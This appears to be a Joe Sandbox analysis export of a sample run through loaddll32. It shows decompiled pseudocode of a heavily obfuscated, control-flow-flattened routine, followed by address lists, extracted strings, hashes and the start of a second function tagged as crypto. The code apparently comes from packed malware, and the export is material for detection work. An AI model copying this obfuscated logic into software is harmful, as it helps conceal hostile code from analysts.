				_v336 = _v336 ^ 0x2e57dda5;
				_v144 = 0xd04b4f;
				_v144 = _v144 | 0x24a920ad;
				_v144 = _v144 ^ 0x24f2194c;
				_v332 = 0xa51135;
				_v332 = _v332 | 0x0e3f3b11;
				_v332 = _v332 << 1;
				_v332 = _v332 ^ 0x1d7bc296;
				_v432 = 0x91d3da;
				_v432 = _v432 ^ 0xfb7827da;
				_v432 = _v432 ^ 0x8307cadb;
				_v432 = _v432 ^ 0x96a6215b;
				_v432 = _v432 ^ 0xee460da5;
				_v440 = 0x76ea73;
				_t941 = 0x68;
				_v440 = _v440 * 0x64;
				_v440 = _v440 * 0x74;
				_v440 = _v440 + 0xffff4177;
				_v440 = _v440 ^ 0x0c5f6cc4;
				_v84 = 0xe35803;
				_v84 = _v84 << 2;
				_v84 = _v84 ^ 0x038e6518;
				_v416 = 0xaf3ba8;
				_v416 = _v416 / _t941;
				_v416 = _v416 << 4;
				_v416 = _v416 ^ 0x48935165;
				_v416 = _v416 ^ 0x4881449f;
				_v212 = 0x801900;
				_v212 = _v212 + 0xffff42b5;
				_v212 = _v212 ^ 0x0072cd25;
				_v308 = 0xdd451d;
				_v308 = _v308 << 7;
				_v308 = _v308 + 0xffff5c98;
				_v308 = _v308 ^ 0x6ea87981;
				_v400 = 0xde1a46;
				_v400 = _v400 + 0xffff765a;
				_v400 = _v400 / _t941;
				_v400 = _v400 << 9;
				_v400 = _v400 ^ 0x044894be;
				_v316 = 0xd965ab;
				_t942 = 0x67;
				_v316 = _v316 / _t942;
				_v316 = _v316 ^ 0xab5bfdd1;
				_v316 = _v316 ^ 0xab5ad192;
				_v408 = 0x2ea377;
				_v408 = _v408 ^ 0x7c77aa70;
				_v408 = _v408 * 0x1b;
				_t943 = 0x5b;
				_v408 = _v408 / _t943;
				_v408 = _v408 ^ 0x00544ec9;
				_v324 = 0xbe9a08;
				_t944 = 0x3b;
				_v324 = _v324 * 0x43;
				_v324 = _v324 >> 2;
				_v324 = _v324 ^ 0x0c769314;
				_v300 = 0x976b15;
				_v300 = _v300 + 0xffff7da5;
				_v300 = _v300 ^ 0x81b758ca;
				_v300 = _v300 ^ 0x81238506;
				_v180 = 0xcec496;
				_v180 = _v180 + 0xd8a;
				_v180 = _v180 ^ 0x00c56088;
				_v188 = 0xaed086;
				_v188 = _v188 / _t944;
				_v188 = _v188 ^ 0x0009ea52;
				_v196 = 0x3b56fa;
				_v196 = _v196 ^ 0xac6111bd;
				_v196 = _v196 ^ 0xac5e4370;
				_v292 = 0x9c517b;
				_t945 = 0xe;
				_v292 = _v292 * 0x4d;
				_v292 = _v292 << 0x10;
				_v292 = _v292 ^ 0x81f0babf;
				_v164 = 0xb8b001;
				_v164 = _v164 * 0x6d;
				_v164 = _v164 ^ 0x4ea63487;
				_v172 = 0xad6cfe;
				_v172 = _v172 + 0xffff2ed4;
				_v172 = _v172 ^ 0x00a06f33;
				_v392 = 0x7c182;
				_v392 = _v392 + 0xffff354a;
				_v392 = _v392 >> 9;
				_v392 = _v392 | 0x25902c29;
				_v392 = _v392 ^ 0x259a4e3f;
				_v384 = 0x5bc0d6;
				_v384 = _v384 << 1;
				_v384 = _v384 >> 3;
				_v384 = _v384 >> 0xb;
				_v384 = _v384 ^ 0x00007445;
				_v148 = 0xb53a42;
				_v148 = _v148 + 0x9a8c;
				_v148 = _v148 ^ 0x00ba1df9;
				_v340 = 0x4937cc;
				_v340 = _v340 / _t945;
				_v340 = _v340 * 0x55;
				_v340 = _v340 ^ 0x01b4526f;
				_v156 = 0xcb2355;
				_v156 = _v156 + 0x87d8;
				_v156 = _v156 ^ 0x00cab12c;
				_v276 = 0x1d3606;
				_v276 = _v276 ^ 0xef8573e3;
				_v276 = _v276 + 0xe74c;
				_v276 = _v276 ^ 0xef9451f2;
				_v124 = 0xea90d8;
				_v124 = _v124 >> 0xc;
				_v124 = _v124 ^ 0x000c3a09;
				_v132 = 0x9d7def;
				_v132 = _v132 << 0xe;
				_v132 = _v132 ^ 0x5f719987;
				_v376 = 0x89d7c2;
				_v376 = _v376 + 0xfffff23e;
				_v376 = _v376 | 0x7c68b11f;
				_v376 = _v376 ^ 0xbb3726b5;
				_v376 = _v376 ^ 0xc7d510ca;
				_v140 = 0x76a014;
				_t946 = 0x62;
				_v140 = _v140 * 0x5d;
				_v140 = _v140 ^ 0x2b1c15f7;
				_v236 = 0x97a0b2;
				_v236 = _v236 + 0xb8c3;
				_v236 = _v236 / _t946;
				_v236 = _v236 ^ 0x00048326;
				_v244 = 0xf40f05;
				_v244 = _v244 >> 9;
				_v244 = _v244 + 0xffff2918;
				_v244 = _v244 ^ 0xfff951ac;
				_v252 = 0x8be7d4;
				_t947 = 0x63;
				_v252 = _v252 * 0x1e;
				_v252 = _v252 | 0x42cac185;
				_v252 = _v252 ^ 0x52ef1e67;
				_v116 = 0xbde76;
				_v116 = _v116 * 0x7b;
				_v116 = _v116 ^ 0x05b04958;
				_v328 = 0xeb1d65;
				_v328 = _v328 + 0xffffd1f9;
				_v328 = _v328 / _t947;
				_v328 = _v328 ^ 0x00025d34;
				_v280 = 0x68b6dc;
				_v280 = _v280 << 4;
				_v280 = _v280 + 0xffffca90;
				_v280 = _v280 ^ 0x06815cee;
				_v284 = 0x6fbf52;
				_t948 = 0x39;
				_v284 = _v284 / _t948;
				_v284 = _v284 >> 0xc;
				_v284 = _v284 ^ 0x000af32e;
				_v128 = 0xe16a7a;
				_v128 = _v128 << 0xa;
				_v128 = _v128 ^ 0x85a6bd86;
				_v136 = 0xc45446;
				_v136 = _v136 * 0x2c;
				_v136 = _v136 ^ 0x21b71382;
				_v356 = 0x71f336;
				_v356 = _v356 ^ 0x2de7f7fe;
				_v356 = _v356 ^ 0x8a07c7d3;
				_v356 = _v356 ^ 0x93c759d9;
				_v356 = _v356 ^ 0x3457e38a;
				_v444 = 0xc2e3ca;
				_v444 = _v444 + 0xd370;
				_v444 = _v444 * 0x17;
				_v444 = _v444 | 0x81628588;
				_v444 = _v444 ^ 0x91feaa64;
				_v216 = 0xda26e7;
				_v216 = _v216 | 0x60c5a9c9;
				_v216 = _v216 ^ 0x60dd12b5;
				_v192 = 0x3f7410;
				_v192 = _v192 ^ 0x1d5bbab7;
				_v192 = _v192 ^ 0x1d6fbf93;
				_v312 = 0x4ada65;
				_v312 = _v312 << 0xd;
				_v312 = _v312 >> 7;
				_v312 = _v312 ^ 0x00bfdaf9;
				_v272 = 0xabf11;
				_v272 = _v272 | 0xa59dca8e;
				_v272 = _v272 + 0x20a8;
				_v272 = _v272 ^ 0xa5a7fe59;
				_v224 = 0x8674d0;
				_t1041 = 0x129d0b2;
				_t1038 = 0x319c4b5;
				_t949 = 0x14;
				_v224 = _v224 / _t949;
				_v224 = _v224 ^ 0x000de1f0;
				_v320 = 0xda9bb0;
				_v320 = _v320 | 0x2a57cad9;
				_t950 = 0x36;
				_v320 = _v320 * 0xf;
				_v320 = _v320 ^ 0x831ebdeb;
				_v240 = 0xa163ed;
				_v240 = _v240 * 0xb;
				_v240 = _v240 ^ 0x8dcbf844;
				_v240 = _v240 ^ 0x8b2bfc33;
				_v428 = 0x5ed42b;
				_v428 = _v428 + 0xffff1d19;
				_v428 = _v428 * 0x50;
				_v428 = _v428 << 2;
				_v428 = _v428 ^ 0x75680dd8;
				_v88 = 0xfa72dc;
				_v88 = _v88 >> 7;
				_v88 = _v88 ^ 0x0007f8f8;
				_v388 = 0x10dc91;
				_v388 = _v388 / _t950;
				_v388 = _v388 >> 2;
				_v388 = _v388 | 0xaac1de12;
				_v388 = _v388 ^ 0xaac723cf;
				_v304 = 0xa7cb34;
				_v304 = _v304 ^ 0x1c82ce84;
				_v304 = _v304 + 0xffff27ec;
				_v304 = _v304 ^ 0x1c2c2c1b;
				_v360 = 0x85a407;
				_v360 = _v360 << 0x10;
				_v360 = _v360 ^ 0xf399b7e8;
				_t951 = 0x7b;
				_v360 = _v360 * 0xb;
				_v360 = _v360 ^ 0xc3d703da;
				_v108 = 0x2c5900;
				_v108 = _v108 | 0x18e96d33;
				_v108 = _v108 ^ 0x18efd740;
				_v368 = 0x82a9c5;
				_v368 = _v368 * 0x63;
				_v368 = _v368 / _t951;
				_v368 = _v368 << 9;
				_v368 = _v368 ^ 0xd254d318;
				_v344 = 0x646456;
				_v344 = _v344 | 0x8bd14a3d;
				_v344 = _v344 ^ 0xb757bf6b;
				_v344 = _v344 ^ 0xc7e8113d;
				_v344 = _v344 ^ 0xfb40f9ed;
				_v352 = 0x76afda;
				_v352 = _v352 | 0xbd2b6ebb;
				_v352 = _v352 + 0xffffcbc9;
				_v352 = _v352 << 5;
				_v352 = _v352 ^ 0xaffdfdca;
				while(1) {
					L1:
					_t1017 = 0xbed0fa7;
					_t952 = 0x2dc73db;
					_t880 = 0x45ef02b;
					goto L2;
					do {
						while(1) {
							L2:
							_t1054 = _t929 - _t880;
							if(_t1054 <= 0) {
								break;
							}
							__eflags = _t929 - 0xa3576f8;
							if(_t929 == 0xa3576f8) {
								_t1018 =  *0xd56224; // 0x0
								E00D52B09(_v360,  *((intOrPtr*)(_t1018 + 0x50)), _v108, _v368);
								_t929 = _t1038;
								L25:
								_t880 = 0x45ef02b;
								_t952 = 0x2dc73db;
								_t1017 = 0xbed0fa7;
								goto L26;
							}
							__eflags = _t929 - _t1017;
							if(__eflags == 0) {
								_push(_v156);
								_push(_v340);
								_push(_v148);
								_t883 = E00D4E1F8(0xd313f8, _v384, __eflags);
								_t884 =  *0xd56224; // 0x0
								__eflags = E00D3F288(_v268, _v276, _t883, _v124,  &_v76, _t884 + 0x54, _v132, 0xd313f8, _v376, _v80, _v140) - _v260;
								_t929 =  ==  ? 0x2dc73db : _t1038;
								E00D4FECB(_t883, _v236, _v244, _v252, _v116);
								_t1048 =  &(_t1048[0xf]);
								L15:
								_t1041 = 0x129d0b2;
								goto L25;
							}
							__eflags = _t929 - 0xda5043f;
							if(__eflags != 0) {
								goto L26;
							}
							_t929 = 0x2e16ae;
						}
						if(_t1054 == 0) {
							_push(_v336);
							_push(_v396);
							_push(_v448);
							_t891 = E00D4E1F8(0xd313a8, _v104, __eflags);
							_push(_v440);
							_t1039 = _t891;
							_push(_v432);
							_push(_v332);
							_t892 = E00D4E1F8(0xd31498, _v144, __eflags);
							_v64 = _v424;
							_t894 = E00D400C5(_t1039, _v84, _v416);
							_v56 = _v56 & 0x00000000;
							_v60 = _t1039;
							_v52 = 1;
							_v68 = 2 + _t894 * 2;
							_v48 =  &_v68;
							_t897 = 0x20;
							_v76 = _t897;
							__eflags = E00D349A4(_v212,  &_v56, _v308,  &_v32, _v400, _v220, _v316,  &_v76, _v72, _t897, _t892, _v408, _v324) - _v204;
							_t929 =  ==  ? 0xbed0fa7 : 0x319c4b5;
							E00D4FECB(_t1039, _v300, _v180, _v188, _v196);
							E00D4FECB(_t892, _v292, _v164, _v172, _v392);
							_t1048 =  &(_t1048[0x18]);
							L17:
							_t1038 = 0x319c4b5;
							goto L15;
						}
						if(_t929 == 0x2e16ae) {
							_push(_v264);
							_push(_v184);
							_push(_v364);
							_t905 = E00D4E1F8(0xd31468, _v420, __eflags);
							_push(_v120);
							_push(_v176);
							_push(_v380);
							__eflags = E00D3738A(_v288, _t905, _v232, _v168,  &_v80, E00D4E1F8(0xd31318, _v100, __eflags), _v296) - _v112;
							_t929 =  ==  ? 0x45ef02b : 0x45eecb1;
							E00D4FECB(_t905, _v160, _v348, _v412, _v256);
							E00D4FECB(_t906, _v372, _v152, _v404, _v92);
							_t1048 =  &(_t1048[0x11]);
							goto L17;
						}
						if(_t929 == _t1041) {
							_push(_v216);
							_push(_v444);
							_push(_v356);
							_t1045 = E00D4E1F8(0xd31438, _v136, __eflags);
							_v44 = _v436;
							_v40 = _v208;
							_v36 = _v96;
							_t918 =  *0xd56224; // 0x0
							_t974 =  *0xd56224; // 0x0
							_t919 = E00D350E8( *((intOrPtr*)(_t974 + 0x54)), _v192, _v312, _v272, _v224,  *((intOrPtr*)(_t918 + 0x50)), _v80, _v320, 0xd31438, 0xd31438,  &_v44, _v200, 0xd31438, _v240, _t913);
							_t1052 =  &(_t1048[0x10]);
							__eflags = _t919 - _v248;
							if(_t919 != _v248) {
								_t929 = 0xa3576f8;
							} else {
								_t929 = _t1038;
								_t1046 = 1;
							}
							E00D4FECB(_t1045, _v428, _v88, _v388, _v304);
							_t1048 =  &(_t1052[3]);
							goto L15;
						}
						if(_t929 == _t952) {
							_t925 =  *0xd56224; // 0x0
							_push(_t952);
							_push(_t952);
							_t977 = E00D3C5D8( *((intOrPtr*)(_t925 + 0x54)));
							_t1048 =  &(_t1048[3]);
							_t927 =  *0xd56224; // 0x0
							__eflags = _t977;
							_t929 =  !=  ? _t1041 : _t1038;
							 *((intOrPtr*)(_t927 + 0x50)) = _t977;
							goto L1;
						}
						if(_t929 != _t1038) {
							goto L26;
						}
						E00D3F7FE(_v344, _v80, _v352, _v228);
						L9:
						return _t1046;
						L26:
						__eflags = _t929 - 0x45eecb1;
					} while (__eflags != 0);
					goto L9;
				}
			}

0x00d33431
0x00d33437
0x00d33441
0x00d33450
0x00d33457
0x00d33459
0x00d3345e
0x00d33469
0x00d3346e
0x00d3346f
0x00d33473
0x00d3347b
0x00d33486
0x00d33491
0x00d3349c
0x00d334a4
0x00d334a9
0x00d334b1
0x00d334b6
0x00d334be
0x00d334c9
0x00d334d1
0x00d334dc
0x00d334e7
0x00d334ef
0x00d334fa
0x00d33505
0x00d33510
0x00d3351b
0x00d33526
0x00d3352e
0x00d33539
0x00d33544
0x00d3354f
0x00d3355a
0x00d33565
0x00d33570
0x00d3357b
0x00d33586
0x00d33591
0x00d3359c
0x00d335a7
0x00d335b2
0x00d335bd
0x00d335c8
0x00d335d0
0x00d335db
0x00d335ef
0x00d335f6
0x00d335fe
0x00d33609
0x00d33614
0x00d3361c
0x00d33627
0x00d3362f
0x00d33637
0x00d3363f
0x00d33647
0x00d3364f
0x00d3365c
0x00d33660
0x00d3366d
0x00d33671
0x00d33679
0x00d33684
0x00d3368f
0x00d3369a
0x00d336a5
0x00d336af
0x00d336ba
0x00d336c5
0x00d336da
0x00d336dd
0x00d336e4
0x00d336ef
0x00d336f7
0x00d336ff
0x00d33707
0x00d3370c
0x00d33714
0x00d3371f
0x00d3372a
0x00d33735
0x00d3374b
0x00d33752
0x00d3375d
0x00d33768
0x00d33773
0x00d3377b
0x00d33786
0x00d33799
0x00d3379c
0x00d337ae
0x00d337b5
0x00d337c0
0x00d337cb
0x00d337d6
0x00d337de
0x00d337e9
0x00d337f4
0x00d337ff
0x00d3380a
0x00d33812
0x00d3381e
0x00d33821
0x00d33825
0x00d3382a
0x00d33832
0x00d3383a
0x00d33842
0x00d33847
0x00d3384f
0x00d33857
0x00d33862
0x00d3386d
0x00d33878
0x00d33883
0x00d3388b
0x00d33890
0x00d33895
0x00d3389d
0x00d338a5
0x00d338b0
0x00d338bb
0x00d338c6
0x00d338ce
0x00d338d6
0x00d338de
0x00d338e6
0x00d338ee
0x00d338f9
0x00d33904
0x00d3390f
0x00d3391a
0x00d33922
0x00d3392f
0x00d3393e
0x00d33941
0x00d33945
0x00d3394d
0x00d33955
0x00d3395d
0x00d33965
0x00d33975
0x00d33979
0x00d3397e
0x00d33986
0x00d33991
0x00d3399c
0x00d339a7
0x00d339b2
0x00d339bd
0x00d339c8
0x00d339d3
0x00d339de
0x00d339e9
0x00d339f0
0x00d339fb
0x00d33a03
0x00d33a0b
0x00d33a13
0x00d33a1b
0x00d33a23
0x00d33a30
0x00d33a33
0x00d33a3c
0x00d33a40
0x00d33a48
0x00d33a50
0x00d33a5b
0x00d33a63
0x00d33a6e
0x00d33a7e
0x00d33a82
0x00d33a87
0x00d33a8f
0x00d33a97
0x00d33aa2
0x00d33aad
0x00d33ab8
0x00d33ac3
0x00d33acb
0x00d33ad6
0x00d33ae1
0x00d33ae9
0x00d33af9
0x00d33afd
0x00d33b02
0x00d33b0a
0x00d33b1c
0x00d33b1f
0x00d33b26
0x00d33b31
0x00d33b3c
0x00d33b44
0x00d33b51
0x00d33b5d
0x00d33b62
0x00d33b68
0x00d33b70
0x00d33b83
0x00d33b86
0x00d33b8d
0x00d33b95
0x00d33ba0
0x00d33bab
0x00d33bb6
0x00d33bc1
0x00d33bcc
0x00d33bd7
0x00d33be2
0x00d33bed
0x00d33c03
0x00d33c0a
0x00d33c15
0x00d33c20
0x00d33c2b
0x00d33c36
0x00d33c49
0x00d33c4a
0x00d33c51
0x00d33c59
0x00d33c64
0x00d33c77
0x00d33c7e
0x00d33c89
0x00d33c94
0x00d33c9f
0x00d33caa
0x00d33cb2
0x00d33cba
0x00d33cbf
0x00d33cc7
0x00d33ccf
0x00d33cd7
0x00d33cdb
0x00d33ce0
0x00d33ce5
0x00d33ced
0x00d33cf8
0x00d33d03
0x00d33d0e
0x00d33d1c
0x00d33d25
0x00d33d29
0x00d33d31
0x00d33d3c
0x00d33d47
0x00d33d52
0x00d33d5d
0x00d33d68
0x00d33d73
0x00d33d7e
0x00d33d89
0x00d33d91
0x00d33d9c
0x00d33da7
0x00d33daf
0x00d33dba
0x00d33dc2
0x00d33dca
0x00d33dd2
0x00d33ddc
0x00d33de4
0x00d33df9
0x00d33dfc
0x00d33e03
0x00d33e0e
0x00d33e19
0x00d33e2f
0x00d33e36
0x00d33e41
0x00d33e4c
0x00d33e54
0x00d33e5f
0x00d33e6a
0x00d33e7d
0x00d33e80
0x00d33e87
0x00d33e92
0x00d33e9d
0x00d33eb0
0x00d33eb7
0x00d33ec2
0x00d33ecd
0x00d33ee3
0x00d33eea
0x00d33ef5
0x00d33f00
0x00d33f08
0x00d33f13
0x00d33f1e
0x00d33f30
0x00d33f33
0x00d33f3a
0x00d33f42
0x00d33f4d
0x00d33f58
0x00d33f60
0x00d33f6b
0x00d33f7e
0x00d33f85
0x00d33f90
0x00d33f98
0x00d33fa0
0x00d33fa8
0x00d33fb0
0x00d33fb8
0x00d33fc0
0x00d33fcd
0x00d33fd1
0x00d33fd9
0x00d33fe1
0x00d33fec
0x00d33ff7
0x00d34002
0x00d3400d
0x00d34018
0x00d34023
0x00d3402e
0x00d34036
0x00d3403e
0x00d34049
0x00d34054
0x00d3405f
0x00d3406a
0x00d34077
0x00d34082
0x00d3408e
0x00d34095
0x00d3409a
0x00d340a3
0x00d340ae
0x00d340b9
0x00d340cc
0x00d340cf
0x00d340d6
0x00d340e1
0x00d340f4
0x00d340fb
0x00d34106
0x00d34111
0x00d34119
0x00d34126
0x00d3412a
0x00d3412f
0x00d34137
0x00d34142
0x00d3414a
0x00d34155
0x00d34165
0x00d34169
0x00d3416e
0x00d34176
0x00d3417e
0x00d34189
0x00d34194
0x00d3419f
0x00d341aa
0x00d341b2
0x00d341b7
0x00d341c4
0x00d341c5
0x00d341c9
0x00d341d1
0x00d341dc
0x00d341e7
0x00d341f2
0x00d341ff
0x00d34209
0x00d3420d
0x00d34212
0x00d3421a
0x00d34222
0x00d3422a
0x00d34232
0x00d3423a
0x00d34242
0x00d3424a
0x00d34252
0x00d3425a
0x00d3425f
0x00d34267
0x00d34267
0x00d34267
0x00d3426c
0x00d34271
0x00d34271
0x00d34276
0x00d34276
0x00d34276
0x00d34276
0x00d34278
0x00000000
0x00000000
0x00d34628
0x00d3462e
0x00d34707
0x00d34714
0x00d3471b
0x00d3471d
0x00d3471d
0x00d34722
0x00d34727
0x00000000
0x00d34727
0x00d34634
0x00d34636
0x00d3464e
0x00d3465a
0x00d34661
0x00d3466c
0x00d34690
0x00d346c7
0x00d346de
0x00d346ef
0x00d346f4
0x00d343ef
0x00d343ef
0x00000000
0x00d343ef
0x00d34638
0x00d3463e
0x00000000
0x00000000
0x00d34644
0x00d34644
0x00d3427e
0x00d344d1
0x00d344dd
0x00d344e1
0x00d344ec
0x00d344f1
0x00d344fa
0x00d344fc
0x00d34500
0x00d3450e
0x00d34526
0x00d3452d
0x00d34534
0x00d34543
0x00d34551
0x00d3455c
0x00d3456a
0x00d34571
0x00d34579
0x00d345d3
0x00d345e3
0x00d345fb
0x00d3461b
0x00d34620
0x00d344c7
0x00d344c7
0x00000000
0x00d344c7
0x00d3428a
0x00d343f9
0x00d34405
0x00d3440c
0x00d34414
0x00d34419
0x00d34427
0x00d3442e
0x00d3447a
0x00d3448e
0x00d3449f
0x00d344bf
0x00d344c4
0x00000000
0x00d344c4
0x00d34292
0x00d34311
0x00d3431d
0x00d34321
0x00d34334
0x00d3433a
0x00d34349
0x00d3435e
0x00d3437e
0x00d343a9
0x00d343b2
0x00d343b7
0x00d343ba
0x00d343c1
0x00d343ca
0x00d343c3
0x00d343c5
0x00d343c7
0x00d343c7
0x00d343e7
0x00d343ec
0x00000000
0x00d343ec
0x00d34296
0x00d342e9
0x00d342ee
0x00d342ef
0x00d342f8
0x00d342fa
0x00d342fd
0x00d34302
0x00d34306
0x00d34309
0x00000000
0x00d34309
0x00d3429a
0x00000000
0x00000000
0x00d342b9
0x00d342c2
0x00d342cc
0x00d3472c
0x00d3472c
0x00d3472c
0x00000000
0x00d34738

Strings

Vdd, xrefs: 00D3421A
{, xrefs: 00D33570
R, xrefs: 00D33C0A
sv, xrefs: 00D33A23
Et, xrefs: 00D33CE5
c, xrefs: 00D3377B
_EBM, xrefs: 00D33473
!Sw, xrefs: 00D336F7
)<L, xrefs: 00D33591
T9, xrefs: 00D33965
zj, xrefs: 00D33F4D
J', xrefs: 00D33627
L, xrefs: 00D33D68

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: !Sw$)<L$Et$L$R$T9$Vdd$_EBM$sv$zj$J'$c${
API String ID: 0-2179300830
Opcode ID: 2b93cfee14aeb0621a187a61986be230e36d463b6bd121c95387a00114071501
Instruction ID: 32a490d1e19390d9059510a489e5e8902063e3faf7438772d2b03d1a6e750452
Opcode Fuzzy Hash: 2b93cfee14aeb0621a187a61986be230e36d463b6bd121c95387a00114071501
Instruction Fuzzy Hash: 2A92EC711093819FD3B9CF25C98AB9FBBE2FBC4304F10891DE19A96260D7B19949CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00D467E6, Relevance: 17.0, Strings: 13, Instructions: 728
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00D467E6(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, signed int* _a28, signed int _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
				intOrPtr _v4;
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _t846;
				intOrPtr _t847;
				signed int _t861;
				void* _t866;
				signed int _t867;
				signed int _t874;
				signed int* _t876;
				signed int _t885;
				void* _t937;
				signed int _t946;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				signed int _t968;
				signed int _t969;
				signed int _t970;
				signed int _t971;
				signed int _t972;
				signed int _t973;
				signed int _t974;
				signed int _t975;
				signed int _t976;
				signed int _t978;
				signed int _t980;
				signed int _t985;
				signed int _t986;
				signed int* _t989;
				void* _t991;

				_t876 = _a28;
				_push(_a48);
				_push(_a44);
				_v4 = __ecx;
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_t876);
				_push(_a24);
				_push(_a20 & 0x0000ffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00D4FE29(_a20 & 0x0000ffff);
				_v304 = 0x84e682;
				_t989 =  &(( &_v304)[0xe]);
				_v304 = _v304 + 0xeb1b;
				_v304 = _v304 ^ 0x0f7f391c;
				_v304 = _v304 ^ 0x0ffae881;
				_t874 = 0;
				_v80 = 0xd03450;
				_t978 = 0x7e00160;
				_v80 = _v80 + 0x474c;
				_v80 = _v80 ^ 0x00d07b8f;
				_v40 = 0x62fb41;
				_v40 = _v40 ^ 0x58566629;
				_v40 = _v40 ^ 0x58349da0;
				_v56 = 0xe1b746;
				_v56 = _v56 + 0x8be3;
				_v56 = _v56 ^ 0x00e2c329;
				_v32 = 0xe6e4c5;
				_v32 = _v32 + 0xfb3f;
				_v32 = _v32 ^ 0x00e7a004;
				_v164 = 0x3535e2;
				_v164 = _v164 + 0xb15e;
				_v164 = _v164 + 0xffff4c2e;
				_v164 = _v164 ^ 0x0075336e;
				_v256 = 0xe056c0;
				_v256 = _v256 >> 0xf;
				_v12 = 0;
				_t960 = 0xf;
				_v256 = _v256 / _t960;
				_t961 = 0x75;
				_v256 = _v256 / _t961;
				_v256 = _v256 ^ 0x00040000;
				_v64 = 0xc12004;
				_v64 = _v64 | 0x05a7924d;
				_v64 = _v64 ^ 0x01e7b24d;
				_v200 = 0x3d9b4;
				_v200 = _v200 + 0xffffba05;
				_t962 = 0x4d;
				_push("true");
				_v200 = _v200 / _t962;
				_v200 = _v200 >> 0xa;
				_v200 = _v200 ^ 0x00080002;
				_v264 = 0xdbb33c;
				_pop(_t963);
				_v264 = _v264 / _t963;
				_v264 = _v264 ^ 0x3bde5a68;
				_t964 = 0x74;
				_v264 = _v264 * 0x67;
				_v264 = _v264 ^ 0x14497559;
				_v172 = 0x2a3d0;
				_v172 = _v172 + 0xffff520a;
				_v172 = _v172 + 0xffffc196;
				_v172 = _v172 ^ 0x0001b670;
				_v16 = 0x40a0dc;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x8000040a;
				_v280 = 0x3a90ef;
				_v280 = _v280 + 0xfffff29b;
				_v280 = _v280 + 0xd15d;
				_v280 = _v280 + 0xffff2fb1;
				_v280 = _v280 ^ 0x003a8498;
				_v276 = 0x2b48bd;
				_v276 = _v276 * 0x59;
				_v276 = _v276 | 0x0b3e9c0e;
				_v276 = _v276 + 0x2f0e;
				_v276 = _v276 ^ 0x0f3f0c8c;
				_v244 = 0xf133cf;
				_v244 = _v244 * 0x50;
				_v244 = _v244 >> 0xe;
				_v244 = _v244 >> 2;
				_v244 = _v244 ^ 0x00004b7f;
				_v220 = 0x48bde3;
				_v220 = _v220 * 7;
				_v220 = _v220 << 3;
				_v220 = _v220 << 7;
				_v220 = _v220 ^ 0xf4c4d41f;
				_v152 = 0xdfcbbb;
				_v152 = _v152 / _t964;
				_v152 = _v152 ^ 0x15954f38;
				_v152 = _v152 ^ 0x1594a2df;
				_v236 = 0x79b2d;
				_v236 = _v236 + 0xffffa56f;
				_v236 = _v236 >> 0xc;
				_v236 = _v236 + 0xffff51ce;
				_v236 = _v236 ^ 0xffff5342;
				_v300 = 0x53b7c5;
				_v300 = _v300 | 0xbc55bbc8;
				_v300 = _v300 >> 0xb;
				_v300 = _v300 * 0x4a;
				_v300 = _v300 ^ 0x06ca0610;
				_v300 = 0x831a37;
				_v300 = _v300 >> 0xa;
				_v300 = _v300 ^ 0xf07c3cef;
				_v300 = _v300 >> 2;
				_v300 = _v300 ^ 0x3c15b978;
				_v296 = 0xbc94b;
				_v296 = _v296 ^ 0xc913797f;
				_v296 = _v296 ^ 0xc91ffb85;
				_v304 = 0xeb47f;
				_v304 = _v304 * 0x21;
				_v304 = _v304 >> 9;
				_v304 = _v304 ^ 0x00079d5b;
				_v296 = 0x863d92;
				_v296 = _v296 | 0xc3fe325e;
				_v296 = _v296 ^ 0xc3f15d89;
				_v304 = 0x8c9292;
				_v304 = _v304 * 0x65;
				_v304 = _v304 * 0x2f;
				_v304 = _v304 ^ 0x2ea0d0e4;
				_v296 = 0x7998c8;
				_v296 = _v296 * 0x1f;
				_v296 = _v296 ^ 0x0ebe6fc9;
				_v304 = 0xc13eda;
				_v304 = _v304 + 0x239b;
				_v304 = _v304 | 0x8aa80eb1;
				_v304 = _v304 ^ 0x8ae5aa52;
				_v304 = 0x2ac635;
				_t965 = 3;
				_v304 = _v304 * 0x1a;
				_v304 = _v304 | 0xa2ccc89a;
				_v304 = _v304 ^ 0xa6da26ac;
				_v296 = 0xd161a;
				_v296 = _v296 >> 0xb;
				_v296 = _v296 ^ 0x00086437;
